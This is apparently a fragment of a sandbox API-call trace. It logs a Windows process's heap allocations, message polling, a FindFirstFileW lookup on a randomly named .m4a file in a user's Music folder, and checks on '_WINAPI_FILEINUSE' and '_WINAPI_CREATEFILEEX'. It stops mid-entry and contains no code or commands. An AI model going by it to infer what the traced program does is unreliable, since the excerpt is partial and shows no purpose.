RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0112.829] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.829] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0112.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7737e170, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0x808b4980, ftLastAccessTime.dwHighDateTime=0x1d5efc7, ftLastWriteTime.dwLowDateTime=0x808b4980, ftLastWriteTime.dwHighDateTime=0x1d5efc7, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="P0gI1wm_F5y2n.m4a", cAlternateFileName="P0GI1W~1.M4A")) returned 0x41ac500 [0112.830] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0112.830] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0112.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0112.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0112.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0112.831] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0112.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0112.831] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0112.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0112.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0112.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0112.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0112.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0112.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0112.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0112.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0112.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0112.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0112.833] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0112.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0112.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0112.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.836] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0112.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0112.837] HeapFree (in: hHeap=0x1780000, 